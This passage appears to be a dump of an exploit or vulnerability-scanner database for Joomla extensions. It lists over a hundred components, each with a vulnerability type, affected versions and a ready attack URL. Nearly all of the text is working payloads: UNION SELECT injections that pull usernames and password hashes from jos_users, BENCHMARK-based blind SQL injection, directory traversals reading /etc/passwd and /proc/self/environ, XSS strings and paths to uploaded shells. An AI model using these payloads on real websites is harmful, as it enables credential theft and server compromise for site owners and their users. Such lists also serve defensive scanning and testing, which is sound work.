hp?option=com_fabrik&view=table&tableid=13+union+select+1---Component: Biblioteca SQL Injection Versions Affected: 1.0 Beta |/components/c om_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1 ,username,password,4,5,6,7,8,9 FROM jos_users%23|/components/com_biblioteca/view s/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password ,4,5,6,7,8,9 FROM jos_users%23 Component: Biblioteca SQL Injection Versions Affected: 1.0 Beta |/components/c om_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,us ername,password,4,5,6,7,8,9 FROM jos_users%23|/components/com_biblioteca/views/b iblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6

    ,7,8,9 FROM jos_users%23 Component: Biblioteca SQL Injection Versions Affected: 1.0 Beta |/index.php?op tion=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,passwor d,4,5,6,7,8,9 FROM jos_users%23|/index.php?option=com_biblioteca&view=biblioteca &testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 Component: Joomla Component com_zina SQL Injection Versions Affected: 2.x |/in dex.php?option=com_zina&view=zina&Itemid=9|/index.php?option=com_zina&view=zina& Itemid=9 Component: JComponent com_extcalendar SQL Injection Versions Affected: "Any" | /components/com_extcalendar/cal_popup.php?extmode=view&extid=|/components/com_ex tcalendar/cal_popup.php?extmode=view&extid= Component: JComponent (com_ongallery) SQL Injection Versions Affected: "Any" | /index.php?option=com_ongallery&task=ft&id=-1+order+by+1--|/index.php?option=com _ongallery&task=ft&id=-1+order+by+1-Component: JComponent (com_ongallery) SQL Injection Versions Affected: "Any" | /index.php?option=com_ongallery&task=ft&id=-1+union+select+1--|/index.php?option =com_ongallery&task=ft&id=-1+union+select+1-Component: Jgrid Local File Inclusion Versions Affected: 1.0|/index.php?option =com_jgrid&controller=../../../../../../../../etc/passwd%00|/index.php?option=co m_jgrid&controller=../../../../../../../../etc/passwd%00 Component: Joomla "com_equipment" Sql Injection Versions Affected: "Any" |/ind ex.php?option=com_equipment&view=details&id=|/index.php?option=com_equipment&vie w=details&id= Component: Joomla "com_equipment" Sql Injection Versions Affected: "Any" |/ind ex.php?option=com_equipment&task=components&id=45&sec_men_id=|/index.php?option= com_equipment&task=components&id=45&sec_men_id= Component: Amblog SQL Injection Versions Affected: 1.0 |/index.php?option=com_ amblog&view=amblog&catid=-1 UNION SELECT @@version|/index.php?option=com_amblog& view=amblog&catid=-1 UNION SELECT @@version Component: JComponent (com_yellowpages) SQL Injection Versions Affected: "Any" |/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,user name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_u sers--|/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a ,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+ jos_users-Component: JComponent com_neorecruit SQL Injection Versions Affected: 1.4 |/in dex.php?option=com_neorecruit&task=offer_view&id=|/index.php?option=com_neorecru it&task=offer_view&id= Component: cgTestimonial XSS Versions Affected: 2.2 |/components/com_cgtestimo nial/video.php?url="><script>alert('xss');</script>|/components/com_cgtestimonia l/video.php?url="><script>alert('xss');</script> Component: JComponent (com_camelcitydb2) SQL Injection Versions Affected: All version |/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(userna me,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--|/index.php?option=com_camel citydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+ from+jos_users-Component: Spielothek SQL Injection Versions Affected: 1.6.9 |/index.php?optio n=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999 9999,NULL),NULL)))|/index.php?option=com_spielothek&task=savebattle&bid=-1 OR (S ELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) Component: Spielothek SQL Injection Versions Affected: 1.6.9 |/index.php?optio n=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHM ARK(9999999999,NULL),NULL)))|/index.php?option=com_spielothek&view=battle&wtbatt le=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) Component: Spielothek SQL Injection Versions Affected: 1.6.9 |/index.php?optio n=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SE LECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))|/index.php?option=com_spiel othek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x4

    1=0x41,BENCHMARK(9999999999,NULL),NULL))) Component: Joomla "com_beamospetition" Sql Injection Versions Affected: "All" |/index.php?option=com_beamospetition&startpage=3&pet=-1 +Union+select+user()+from+jos_users--|/index.php?option=com_beamospetition&start page=3&pet=-1+Union+select+user()+from+jos_users-Component: Joomla Component (com_simpleshop) SQL Injection Versions Affected: "any" |/index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,conc at(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--|/in dex.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(usernam e,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-Component: PBBooking SQL Injection Versions Affected: 1.0.4_3|/index.php?optio n=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999, NULL),NULL)))|/index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF( 0x41=0x41,BENCHMARK(999999999,NULL),NULL))) Component: Joomla Component(com_joomla-visites) RFI Versions Affected: Any |/a dministrator/components/com_joomla-visites/|//administrator/components/com_jooml a-visites/core/include/myMailer.class.php?mosConfig_absolute_path= Component: Joomla "com_youtube" Sql Injection Vulnerability Versions Affected : 1.5 |/index.php?option=com_youtube&id_cate=4|/index.php?option=com_youtube&i d_cate=4 Component: Joomla Component Joomdle SQL vulnerability Versions Affected: 0.24 or lower ;) |/index.php?option=com_joomdle&view=detail&cat_id=1&course_id=|/inde x.php?option=com_joomdle&view=detail&cat_id=1&course_id= Component: Joomla Component (com_oziogallery) SQL Injection Versions Affected: Any |/index.php?option=com_oziogallery&Itemid=|/index.php?option=com_oziogaller y&Itemid= Component: Joomla Component com_iproperty SQL Injection Vulnerability Versions Affected: Any |/index.php?option=com_iproperty&view=agentproperties&id=|/index. php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/sele ct/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,gr oup_concat(username,char(58),password)v3n0m/**/from/**/jos_usersComponent: Joomla Component com_huruhelpdesk SQL Injection Vulnerability Versi ons Affected: Any |/index.php?option=com_huruhelpdesk&view=detail&cid[0]=|/index .php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,c oncat%28username,0x3a,password%29,5,6,7+from+jos_users-Component: Joomla Component (com_staticxt) SQL Injection Vulnerability Version s Affected: Any |/index.php?option=com_staticxt&staticfile=test.php&id=1923|/ind ex.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0 x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users Component: Joomla Component (com_spa) SQL Injection Vulnerability Versions Aff ected: Any |/index.php?option=com_spa&view=spa_product&cid=|/index.php?option=co m_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+j os_users Component: Joomla EasyBlog Persistent XSS Vulnerability Versions Affected: Any |/easyblog/entry/uncategorized|/">><marquee><h1>XSS3d by Sid3^effects</h1><marq uee> Component: Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Inje ction Versions Affected: Any |/index.php?view=videos&type=member&user_id=-62+u nion+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,1 5,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube|/index .php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+ from+jos_users--&option=com_jomtube Component: Joomla Component com_golfcourseguide SQL Injection Vulnerability Ve rsions Affected: Any |/index.php?option=com_golfcourseguide&view=golfcourses&cid =1&id=|/index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= Component: Joomla com_mysms Upload Vulnerability Versions Affected: Any |/?opt ion=com_mysms&Itemid=0&task=phonebook|/?option=com_mysms&Itemid=0&task=phonebook

    Component: Joomla com_myhome BSQLi Vulnerability Versions Affected: Any |/inde x.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm= Component: Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerabil ity Versions Affected: 1.0.4 and previous |/index.php?option=com_qcontacts&Ite mid=1'|/index.php?option=com_qcontacts&Itemid=1' Component: Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerabi lity Versions Affected: Any |/index.php?option=com_seyret&view=|/index.php?opt ion=com_seyret&view= Component: Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulne rability Versions Affected: v2.7.3 |/index.php?option=com_phocagallery&view=ca tegories&Itemid=|/index.php?option=com_phocagallery&view=categories&Itemid= Component: Joomla Component (com_obSuggest) Local File Inclusion Vulnerability Versions Affected: Any |/index.php?option=com_obsuggest&controller=|/index.php? option=com_obsuggest&controller= Component: Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerabi lity Versions Affected: Any |/index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../|/index.php?option=c om_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir =../../../ Component: Joomla com_quran SQL Injection vulnerability Versions Affected: Any |/component/quran/index.php?option=com_quran&action=viewayat&surano=|/component /quran/index.php?option=com_quran&action=viewayat&surano=-69/**/UNION/**/SELECT/ **/1,group_concat(username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e)r 3m1ck,3,4,5/**/FROM/**/jos_users-Component: Joomla Component Matamko Local File Inclusion Vulnerability Version s Affected: Any |/index.php?option=com_matamko&controller=|/index.php?option=com _matamko&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability Versions Affected: Any |/index.php?option=com_iproperty&view=agentproperties& id=|/index.php?option=com_iproperty&view=agentproperties&id= Component: Joomla Component JA Comment Local File Inclusion Vulnerability Vers ions Affected: Any |/index.php?option=com_jacomment&view=|/index.php?option=com_ jacomment&view=../../../../../../../../../../etc/passwd%00 Component: Joomla Component (com_team) SQL Injection Vulnerability Versions Aff ected: Any |/print.php?task=person&id=36 and 1=1|/print.php?task=person&id=36 an d 1=1 Component: Joomla Component com_question SQL Injection Vulnerability Versions Affected: Any |/index.php/?option=com_question&catID=21' and+1=0 union all|/inde x.php/?option=com_question&catID=21' and+1=0 union all Component: Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability Versions Affected: Any |/components/com_xgallery/helpers/img.php?file=|/compon ents/com_xgallery/helpers/img.php?file= Component: Joomla Component (com_jimtawl) LFI Vulnerability Versions Affected: Any |/index.php?option=com_jimtawl&Itemid=12&task=|/index.php?option=com_jimtaw l&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ% 00 Component: Joomla Component com_jfuploader < 2.12 Remote File Upload Versions Affected: Any |/index.php?option=com_jfuploader&Itemid=|/index.php?option=com_jf uploader&Itemid= Component: Joomla Component (com_markt) SQL Injection Vulnerability Versions A ffected: Any |/index.php?option=com_markt&page=show_category&catid=7+union+selec t+0,1,password,3,4,5,username,7,8+from+jos_users--|/index.php?option=com_markt&p age=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_ users-Component: Joomla Component (com_connect) Local File Inclusion Vulnerability V ersions Affected: Any |/index.php?option=com_connect&view=connect&controller=|/i ndex.php?option=com_connect&view=connect&controller=../../../CREDITS.php%00 Component: Joomla com_quran SQL Injection vulnerability Versions Affected: Any |/component/quran/index.php?option=com_quran&action=viewayat&surano=|/component/ quran/index.php?option=com_quran&action=viewayat&surano=

    Component: Joomla Component (com_alfurqan15x) SQL Injection Vulnerability Vers ions Affected: Any |/index.php?option=com_alfurqan15x&action=viewayat&surano=|/i ndex.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1 ,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users-Component: Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection Versions Affected: Any |/index.php?option=com_jeajaxeventcalendar&v iew=alleventlist_more&event_id=-13|/index.php?option=com_jeajaxeventcalendar&vie w=alleventlist_more&event_id=-13 Component: Joomla Component Alameda SQL Injection Versions Affected: 1.0 |/ind ex.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+sel ect+concat_ws(0x3a,username,password)+from+jos_users--|/index.php?option=com_ala meda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,us ername,password)+from+jos_users-Component: Joomla Component Time Returns SQL Injection Versions Affected: 2.0 |/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat _ws(0x3a,username,password),2,3,4,5,6+from+jos_users--|/index.php?option=com_tim ereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password ),2,3,4,5,6+from+jos_users-Component: Joomla Simple File Lister module Directory Traversal Vulnerability Versions Affected: 1.0 |/index.php?option=com_content&view=article&id=[A VALID I D]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../|/index.php?option=com_cont ent&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../ ../ Component: YJ Contact us - Enhanced Joomla Contact Form Local File Inclusion V ersions Affected: "Any" |/index.php?option=com_yjcontactus&view=|/index.php?opti on=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../.. /etc/passwd%00 Component: Joomla com_remository Remote Upload File Versions Affected: "Any" | /components/com_remository_files/file_image_14/1276100016shell.php|/components/c om_remository_files/file_image_14/1276100016shell.php Component: JoomTouch Local File Inclusion Versions Affected: 1.0.2 |/index.php ?option=com_joomtouch&controller=|/index.php?option=com_joomtouch&controller=../ ../../../../../../../../../../../../../../../../../../etc/passwd%00 Component: TNR Enhanced Joomla Search SQL Injection Versions Affected: 3.0.0 | /index.php?search=NoGe&option=com_esearch&searchId=|/index.php?search=NoGe&optio n=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11,12,13,14+from+jos_users-Component: Joomla Component com_jdirectory SQL Injection Versions Affected: "A ny" |/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/ directory,1/Itemid,0|/component/option,com_jdirectory/task,show_content/contenti d,1067/catid,26/directory,1/Itemid,0 Component: Joomla Component com_restaurantguide SQL Injection Versions Affecte d: 1.0.0 |/index.php?option=com_restaurantguide&view=country&id='&Itemid=69|/ind ex.php?option=com_restaurantguide&view=country&id='&Itemid=69 Component: Joomla Component Mosets Tree Shell Upload Versions Affected: 2.1.5 |/components/com_mtree/img/listings/o/{id}.php|/components/com_mtree/img/listing s/o/{id}.php Component: Joomla Component FDione Form Wizard LFI Versions Affected: 1.0.2 <= |/index.php?option=com_dioneformwizard&controller=[LFI]%00|/index.php?option=co m_dioneformwizard&controller=[LFI]%00 Component: Joomla Component Seber Cart Local File Disclosure Versions Affected : 1.0.0.1x <= |/components/com_sebercart/getPic.php?p=[LFD]%00|/components/com_s ebercart/getPic.php?p=[LFD]%00 Component: Component advertising LFI Versions Affected: 2.0 <= |/index.php?opt ion=com_aardvertiser&cat_name=conf&task=<=|/index.php?option=com_aardvertiser&ca t_name=conf&task= Component: Component advertising LFI Versions Affected: 2.0 <= |/index.php?opt ion=com_aardvertiser&task=|/index.php?option=com_aardvertiser&task= Component: Component com_konsultasi SQL Versions Affected: Any <= |/index.php? option=com_konsultasi&act=detail&sid=|/index.php?option=com_konsultasi&act=detai

    l&sid= Component: Custom PHP Pages Component LFI Versions Affected: Any <= |/index.ph p?option=com_php&file=../images/phplogo.jpg|/index.php?option=com_php&file=../im ages/phplogo.jpg Component: Custom PHP Pages Component LFI Versions Affected: Any <= |/index.ph p?option=com_php&file=../js/ie_pngfix.js|/index.php?option=com_php&file=../js/ie _pngfix.js Component: Custom PHP Pages Component LFI Versions Affected: Any <= |/index.ph p?option=com_php&file=../../../../../../../../../../etc/passwd|/index.php?option =com_php&file=../../../../../../../../../../etc/passwd Component: Component com_articleman Versions Affected: Any <= |/index.php?opti on=com_articleman&task=new|/index.php?option=com_articleman&task=new Component: Alpha2 Versions Affected: 1.6.0 <= |/Joomla_1.6.0-Alpha2-Full-Packa ge/components/com_mailto/assets/close-x.png|/Joomla_1.6.0-Alpha2-Full-Package/co mponents/com_mailto/assets/close-x.png Component: Component Card View JX XSS Versions Affected: Any <= |/index.php?op tion=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=|/index.php?option=com_grid&g id=15_ok_0',%20'15_ok_0&data_search= Component: Component Card View JX XSS Versions Affected: Any <= |/index.php?op tion=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=|/index.php?option=com_g rid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= Component: Component Table JX XS Versions Affected: Any <= |/index.php?option= com_grid&gid=15_ok_0',%20'15_ok_0&data_search=|/index.php?option=com_grid&gid=15 _ok_0',%20'15_ok_0&data_search= Component: Component com_newsfeeds SQL injection Versions Affected: Any <= |/i ndex.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,con cat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--|/index.php?option=com_ newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char% 2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30%20from%20jos_users-Component: Wap4Joomla SQL Injection Versions Affected: Any <= |/wap/wapmain.ph p?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos _users+limit+0,1--|/wap/wapmain.php?option=onews&action=link&id=-154+union+selec t+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-Component: Component graphics LFI Versions Affected: 1.0.6 <= |/index.php?opti on=com_graphics&controller=|/index.php?option=com_graphics&controller= Component: ABC Extension com_abc SQL Versions Affected: 1.1.7 <= |/index.php?o ption=com_abc&view=abc&letter=AS&sectionid='|/index.php?option=com_abc&view=abc& letter=AS&sectionid=' Component: SmartSite LFI Versions Affected: Any <= |/index.php?option=com_smar tsite&controller=|/index.php?option=com_smartsite&controller= Component: NoticeBoard Local File Inclusion Versions Affected: 1.3<= |/index.p hp?option=com_noticeboard&controller=|/index.php?option=com_noticeboard&controll er= Component: Ultimate Portfolio Local File Inclusion Versions Affected: 1.0<= |/ index.php?option=com_ultimateportfolio&controller=|/index.php?option=com_ultimat eportfolio&controller= Component: Component com_joomradio SQL injection Versions Affected: Any<= |/in dex2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat (username,0x3a,password),3,4,5,6,7+from+jos_users--|/index2.php?option=com_joomr adio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password), 3,4,5,6,7+from+jos_users-Component: Joomla com_socialads Persistent Xss Vulnerability Versions Affecte d: Any <= |/js/index.php?option=com_socialads&view=showad&Itemid=94|">><marquee> <h1>XSS3d By Sid3^effects</h1><marquee> Component: Joomla Jobprofile Component (com_jobprofile) SQL Injection Versions Affected: Any <= |/index.php?option=com_jobprofile&Itemid=61&task=profilesview&

    id=1'|/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+a ll+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users-Component: QContacts 1.0.6 (Joomla component) SQL injection Versions Affected: 1.0.6 <= |/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_o rder_Dir=&option=com_qcontacts|/index.php?option=com_qcontacts?=catid=0&filter_o rder=[SQLi]&filter_order_Dir=&option=com_qcontacts Component: Joomla Component (com_dshop) SQL Injection Vulnerability Versions A ffected: Any <= |/index.php?option=com_dshop&controller=fpage&task=flypage&idofi tem=12|/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12+uni on+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users Component: Joomla com_jnewsletter SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_jstore&controller=product-display&task=1'|/index.php?opt ion=com_jstore&controller=product-display&task=1' Component: Joomla com_jsubscription SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_jsubscription&controller=subscription&task=1'|/index.p hp?option=com_jsubscription&controller=subscription&task=1' Component: Joomla com_jmarket SQLi Vulnerability Versions Affected: Any <= |/i ndex.php?option=com_jmarket&controller=product&task=1'|/index.php?option=com_jma rket&controller=product&task=1' Component: Joomla com_jcommunity SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_jcommunity&controller=members&task=1'|/index.php?option=c om_jcommunity&controller=members&task=1' Component: Joomla com_jtickets SQLi Vulnerability Versions Affected: Any <= |/ index.php?option=com_jtickets&controller=ticket&task=1'|/index.php?option=com_jt ickets&controller=ticket&task=1' Component: Joomla com_jstore SQLi Vulnerability Versions Affected: Any <= |/in dex.php?option=com_jstore&controller=product-display&task=1'|/index.php?option=c om_jstore&controller=product-display&task=1' Component: Joomla Component com_lead SQL Injection Versions Affected: Any <= | /index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'|/index .php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' Component: Joomla Component ChronoForms (com_chronocontact) Versions Affected: Any <= |/index.php?option=com_chronocontact&itemid=1|/index.php?option=com_chro nocontact&itemid=1 Component: Joomla Component ChronoConnectivity Versions Affected: Any <= |/ind ex.php?option=com_chronoconnectivity&itemid=1|/index.php?option=com_chronoconnec tivity&itemid=1 Component: Joomla component cinema SQL injection Vulnerability Versions Affect ed: Any <= |/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=|/index.php ?option=com_cinema&Itemid=S@BUN&func=deta%20il&id=-99999/**/union/**/select/**/0 ,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,%2019,20,21,22,23,24,25,26,27,2 8,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_usersComponent: Joomla Component com_annonces Upload Vulnerability Versions Affecte d: Any <= |/index.php?option=com_annonces&view=edit&Itemid=1|/index.php?option=c om_annonces&view=edit&Itemid=1 Component: Joomla Component com_searchlog SQL Injection Versions Affected: 3.1 .0 <= |/administrator/index.php?option=com_searchlog&act=log|/administrator/inde x.php?option=com_searchlog&act=log Component: Joomla Component com_djartgallery Multiple Vulnerabilities Versions Affected: 0.9.1 <= |/administrator/index.php?option=com_djartgallery&task=editI tem&cid[]=1'+and+1=1+--+|/administrator/index.php?option=com_djartgallery&task=e ditItem&cid[]=1'+and+1=1+--+ Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability Versions Affected: Any <= |/index.php?option=com_iproperty&view=agentproperti es&id=|/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/ **/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-Component: Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vuln erability Versions Affected: Any <= |/index.php?option=com_beeheard&controller =../../../../../../../../../../etc/passwd%00|/index.php?option=com_beeheard&cont

    roller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component Deluxe Blog Factory com_blogfactory Local File Inclu sion Vulnerability Versions Affected: Any <= |/index.php?option=com_blogfactor y&controller=../../../../../../../../../../etc/passwd%00|/index.php?option=com_b logfactory&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component Delicious Bookmarks com_delicious Local File Inclusi on Vulnerability Versions Affected: Any <= |/index.php?option=com_delicious&co ntroller=../../../../../../../../../../etc/passwd%00|/index.php?option=com_delic ious&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla Component JA Comment com_jacomment Local File Inclusion Vulner ability Versions Affected: Any <= |/index.php?option=com_jacomment&view=../../ ../../../../../../../../etc/passwd%00|/index.php?option=com_jacomment&view=../.. /../../../../../../../../etc/passwd%00 Component: Joomla Component Love Factory com_lovefactory Local File Inclusion Vu lnerability Versions Affected: Any <= |/index.php?option=com_lovefactory&contr oller=../../../../../../../../../../etc/passwd%00|/index.php?option=com_lovefact ory&controller=../../../../../../../../../../etc/passwd%00 Component: Joomla com_worldrates Local File Inclusion Vulnerability Versions A ffected: Any <= |/index.php?option=com_worldrates&controller=../../../../../../. ./../../../etc/passwd%00|/index.php?option=com_worldrates&controller=../../../.. /../../../../../../etc/passwd%00 Component: Joomla com_record Local File Inclusion Vulnerability Versions Affec ted: Any <= |/index.php?option=com_record&controller=../../../../../../../../../ ../etc/passwd%00|/index.php?option=com_record&controller=../../../../../../../.. /../../etc/passwd%00 Component: Joomla Component JA Voice com_javoice LFI vulnerability Versions Af fected: Any <= |/index.php?option=com_javoice&view=../../../../../../../../../.. /../../../../../etc/passwd%00|/index.php?option=com_javoice&view=../../../../../ ../../../../../../../../../../etc/passwd%00 Component: Joomla Component com_pcchess Local File Inclusion Versions Affected : Any <= |/index.php?option=com_pcchess&controller=../../../../../../../../../.. /../../../etc/passwd%00|/index.php?option=com_pcchess&controller=../../../../../ ../../../../../../../../etc/passwd%00 Component: Joomla component huruhelpdesk SQL injection Vulnerability Versions Affected: Any <= |/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1|/inde x.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 Component: Joomla Component com_properties[aid] SQL Injection Vulnerability Ve rsions Affected: Any <= |/index.php?option=com_properties&task=agentlisting&aid= |/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2 ,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from +jos_users-Component: Joomla component huruhelpdesk SQL injection Vulnerability Versions Affected: Any <= |/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1|/inde x.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 Component: Joomla Discussions Component (com_discussions) SQL Injection Vulnerab ility Versions Affected: Any <= |/index.php?option=com_discussions&view=thread &catid=[Correct CatID]&thread=-1|/index.php?option=com_discussions&view=thread&c atid=[Correct CatID]&thread=-1 Component: Joomla com_jomdirectory SQL-inj Vuln Versions Affected: Any <= |/in dex.php?option=com_jomdirectory&task=search&type=111+|/index.php?option=com_jomd irectory&task=search&type=111+ Component: Joomla Component com_advert SQLi Vulnerability Versions Affected: A ny <= |/index.php?option=com_advert&id=36'|/index.php?option=com_advert&id=36' Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_products&task=category&catid=-1|/index. php?option=com_products&task=category&catid=-1 Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_products&id=-1|/index.php?option=com_pr oducts&id=-1

    Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_products&catid=-1|/index.php?option=com _products&catid=-1 Component: Joomla Component com_products Multiple SQLi Vulnerability Versions Affected: Any <= |/index.php?option=com_products&product_id=-1|/index.php?optio n=com_products&product_id=-1 Component: Joomla Component com_bbs SQLinjection Vulnerability Versions Affect ed: Any <= |/index.php?option=com_bbs&bid=-1|/index.php?option=com_bbs&bid=-1 Component: Joomla Component com_firmy SQLinjection Vulnerability Versions Affe cted: Any <= |/index.php?option=com_firmy&task=section_show_set&Id=-1|/index.php ?option=com_firmy&task=section_show_set&Id=-1 Component: Joomla Component (com_bnf) SQL Injection Vulnerability Versions Aff ected: Any <= |/index.php?option=com_bnf&task=listar&action=filter_add&seccion=p ago&seccion_id=-1|/index.php?option=com_bnf&task=listar&action=filter_add&seccio n=pago&seccion_id=-1

    You might also like